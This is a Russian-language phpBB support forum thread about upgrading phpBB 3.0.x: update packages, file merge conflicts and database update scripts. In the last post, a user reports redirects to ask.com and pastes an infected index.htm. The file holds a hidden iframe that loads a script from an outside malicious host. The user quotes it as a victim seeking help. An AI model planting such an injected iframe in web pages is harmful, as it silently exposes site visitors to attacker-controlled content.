Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Обновление версии phpBB3

Проблемы с установкой или работой phpBB 3.0.x? Получите помощь здесь!
С 1 января 2017 года phpBB Group прекращает поддержку phpBB версии 3.0.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.0 до 1 июля 2017 года.
Подробнее: Окончание поддержки phpBB 3.0.
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ-3 (phpbb3) | Как задавать вопросы | Как устанавливать моды

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 19 лет 8 месяцев
Откуда: Бердск
Поблагодарили: 15 раз
Контактная информация:

Re: Обновление версии phpBB3

Сообщение crash »

NCom
у них нет скрипта обновления базы?
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16313
Стаж: 17 лет 10 месяцев
Откуда: Красноярск
Благодарил (а): 533 раза
Поблагодарили: 2119 раз
Контактная информация:

Re: Обновление версии phpBB3

Сообщение rxu »

NCom писал(а):слить users, topics и posts со старой базы и залить в новую, а потом
В базе куча связанных таблиц, если вы так сделаете, получите просто невообразимую кашу вместо БД.
Изображение
Аватара пользователя
Serge-ex
phpBB 1.0.0
Сообщения: 2
Стаж: 14 лет 10 месяцев

Re: Обновление версии phpBB3

Сообщение Serge-ex »

Добрый день! Стоит версия 3.0.1. Хотел обновиться автоматом до последней, скачал архив с патчами и папками INSTALL и DOCS. Заливаю папку INSTALL в каталог PHPBB3, набираю http://сайт/phpbb3/install/ - появляется оконо с одной вкладкой ОБЗОР (там где введение, лицензия, поддержка) и всё. А где собственно кнопка Update? Если зайти в админку, потом выбрать СИСТЕМУ, нажать ссылку "Теперь вы можете начать процесс обновления, перейдя в папку install.", получаю вот такую хрень:

Изображение

Что делать?
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16313
Стаж: 17 лет 10 месяцев
Откуда: Красноярск
Благодарил (а): 533 раза
Поблагодарили: 2119 раз
Контактная информация:

Re: Обновление версии phpBB3

Сообщение rxu »

Serge-ex писал(а):скачал архив с патчами
Это какой конкретно? Чтобы появилась закладка обновления, нужно качать пакет автообновления, соовтетственно.
Изображение
Аватара пользователя
Serge-ex
phpBB 1.0.0
Сообщения: 2
Стаж: 14 лет 10 месяцев

Re: Обновление версии phpBB3

Сообщение Serge-ex »

Качал вот этот: phpBB-3.0.4-patch_.tar_.bz2 отсюда http://www.phpbbguru.net/project/patch_files. Вообще, если бы было всё однозначно (возьми вот этот файл и залей в ту дыру), не было бы всех этих "тупых", бомбардирующих данный сайт своими "тупыми" вопросами! Поверьте, у меня помимо форума - ещё дел до чёртиков, а я ломаю голову над шарадами phpbb. Я понимаю, что с бесплатной программы и спрос соответствующий (чего только стоит лабиринт настроек в админке!), но всё-таки...
Аватара пользователя
Палыч
Former team member
Сообщения: 9683
Стаж: 17 лет 10 месяцев
Откуда: Питер
Благодарил (а): 3 раза
Поблагодарили: 454 раза
Контактная информация:

Re: Обновление версии phpBB3

Сообщение Палыч »

Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 18 лет 9 месяцев
Поблагодарили: 44 раза
Контактная информация:

Re: Обновление версии phpBB3

Сообщение Rayden »

Serge-ex писал(а):Поверьте, у меня помимо форума - ещё дел до чёртиков, а я ломаю голову над шарадами phpbb. Я понимаю, что с бесплатной программы и спрос соответствующий (чего только стоит лабиринт настроек в админке!), но всё-таки...
Плюнь на форум. Поставь асю - там настроек меньше - и общайся.
К чему это нытье?
phpBB2 FAQ
phpBB3 FAQ
Стопангин
phpBB 1.4.0
Сообщения: 34
Стаж: 16 лет 2 месяца
Благодарил (а): 2 раза

Re: Обновление версии phpBB3

Сообщение Стопангин »

Хочу обновить с 3.0.4 до 3.0.5. Как бычно загрузил папку install (Automatic Update Package), запустил процесс обновления. Обновление базы прошло успешно, а вот с файлами непонятки. Найдены конфликтующие файлы, и предлагается

Объединить файлы и использовать строки нового файла в конфликтных местах
Объединить файлы и использовать модифицированные строки в конфликтных местах
Не объединять - использовать новый файл
Не объединять - использовать имеющийся файл

Что выбрать?

Но это не все. При выборе по умолчанию п.1 во всех файлах после прохождения процедуры окончательного изменения стартует страница ask.com/ с окном ввода параметров поиска. Я пробовал выбрать как "закачать по FTP", так и "загрузить архив модифицированных файлов" (кнопки внизу). Че это за фигня, че предлагается искать и зачем? В прошлый раз при обновлении с 3.0.3 до 3.0.4 ничего такого не было.

В результате в админке написано: Незавершённое автоматическое обновление
версия 3.0.6-RC3_0
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16313
Стаж: 17 лет 10 месяцев
Откуда: Красноярск
Благодарил (а): 533 раза
Поблагодарили: 2119 раз
Контактная информация:

Re: Обновление версии phpBB3

Сообщение rxu »

Стопангин писал(а):Что выбрать?
Мы не знаем, выбирайте то, что вам нужно. ОТ этого зависит, что станет с устанрвленными модами и другими изменениями, внесенными в код.
Стопангин писал(а):При выборе по умолчанию п.1 во всех файлах после прохождения процедуры окончательного изменения стартует страница ask.com/
Это скорее ваша локальная проблема, или каких-то настроек вашего браузера (пробуйте в другом).
Изображение
Стопангин
phpBB 1.4.0
Сообщения: 34
Стаж: 16 лет 2 месяца
Благодарил (а): 2 раза

Re: Обновление версии phpBB3

Сообщение Стопангин »

Первый раз делал все в Опере. Попробовал сейчас в IE. Дошло до "Дождитесь окончания всех операций над изменёнными файлами", и встало. Дальше никуда. Сколько нужно ждать?

Посмотрел - аналогичная проблема возникала у одного из пользователей здесь - Обсуждаем phpBB 3.0 RC6/RC7 (разве что у него что-то там постоянно перезагружалось, а у меня нет). Я снова закачал папку install, повторил все, но с тем же результатом. Какие настройки мне посмотреть?

У меня есть все сохраненное с сервера, даже все из папки store/. Если я тупо скопирую все обратно, все восстановится до исходной точки?

Или же вручную скопировать все из папки с обновлением update/new/ , тогда форум, наконец, обновится до 3.0.5?
версия 3.0.6-RC3_0
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16313
Стаж: 17 лет 10 месяцев
Откуда: Красноярск
Благодарил (а): 533 раза
Поблагодарили: 2119 раз
Контактная информация:

Re: Обновление версии phpBB3

Сообщение rxu »

Насколько модифицирован ваш форум?
Изображение
Стопангин
phpBB 1.4.0
Сообщения: 34
Стаж: 16 лет 2 месяца
Благодарил (а): 2 раза

Re: Обновление версии phpBB3

Сообщение Стопангин »

Вы подразумеваете моды? Там только rss прикручен, больше пока ничего не делал. Да еще в стиле справа налево переделал аватары.

В данный момент форум работает, если только не заходить в "новые сообщения" (после посещения любой ссылки из списка новых сообщентий перенаправляет на поисковик ask.сom ).
Последний раз редактировалось Стопангин 08.06.2009 19:29, всего редактировалось 1 раз.
версия 3.0.6-RC3_0
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16313
Стаж: 17 лет 10 месяцев
Откуда: Красноярск
Благодарил (а): 533 раза
Поблагодарили: 2119 раз
Контактная информация:

Re: Обновление версии phpBB3

Сообщение rxu »

Если зальете новые файлы поверх старых, прикручивать мод придется заново. И не забыть запустить скрипт обновления БД до новой версии.
Изображение
Стопангин
phpBB 1.4.0
Сообщения: 34
Стаж: 16 лет 2 месяца
Благодарил (а): 2 раза

Re: Обновление версии phpBB3

Сообщение Стопангин »

Т.е. даже если стадию обновления БД я успешно прошел еще при попытке автоматического обновления (уже не раз), все равно надо запустить .../database_update.php после всех копирований?


Добавлено спустя 44 минуты 26 секунд:
В общем, все скопировал, базу снова обновил. Итог работы скрипта:
Обновление базы данных до последней стабильной версии

Тип базы данных :: mysql4
Предыдущая версия :: 3.0.5
Обновленная версия :: 3.0.5
Обновление структуры базы данных
Выполнение :: Обновление не требуется
Обновление данных
Выполнение :: Обновление не требуется
Обновление версии и оптимизация таблиц
Выполнение :: . . Готово
Результат :: Без ошибок
Обновление завершено

В админке сказано, что текущая версия самая новая (3.0.5)

Красоту форума ридется наводить снова, но это не самая сложная задача. Проблема в том, что остался тот же глюк - стоит только со страницы новых сообщений попытаться зайти по какому-то из них, идет перенаправление на все тот же ask.com

Добавлено спустя 10 минут 14 секунд:
Попробовал сейчас функцию "поиск", при выполнении выбрасывает на тот же чертов ask.com
версия 3.0.6-RC3_0
Стопангин
phpBB 1.4.0
Сообщения: 34
Стаж: 16 лет 2 месяца
Благодарил (а): 2 раза

Re: Обновление версии phpBB3

Сообщение Стопангин »

Интересные пироги получаются. Если зайти со страницы "новые сообщения" по какой-нибудь ссылке оттуда, то пользователя перенаправляет на этот ask.com , причем сама-то ссылка совершенно корректна - так как если скопировать ее через буфер обмена и выставить в адресной строке браузера, то все нормально, выходишь на это самое новое сообщение темы.

В чем же может быть дело? Все остальное работает.

Не связано ли это вот с чем. Когда я копировал файлы форума (до обновления) на свой компьютер, антивирусник Аваст часто ругался, когда копировались файлы index.htm из какой-либо папки (например, prosilver/imageset/index.htm , обнаруживая в них вирус Iframe-ini . Тогда я на это внимания не обратил, игнорируя сигнализацию. Но сейчас посмотрел один из файлов - и действительно, в теле файла есть строка <iframe src="http://koddavinchi.com/my/in.cgi?9" width="320" height="240"></iframe>

Код: Выделить всё

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
</body>
</html>
<html><body><div style="display:none"><iframe src="http://koddavinchi.com/my/in.cgi?9" width="320" height="240"></iframe></div></body></html>
В папке includes в этом же файле то же самое. Что с ними делать? Удалить? Так ведь наверняка он модифицировал и какие-то из .php .
Одно неясно, адрес вовсе не ask.com . Перенаправляет?

Если это виновато это самое, то заражены и какие-то из файлов, которые не подлежали модификации при обновлении. Могу предположить, что их нужно тупо заменить на исходные (может, из дистрибутива). Но какие?
версия 3.0.6-RC3_0
Закрыто

Вернуться в «Поддержка phpBB 3.0.х»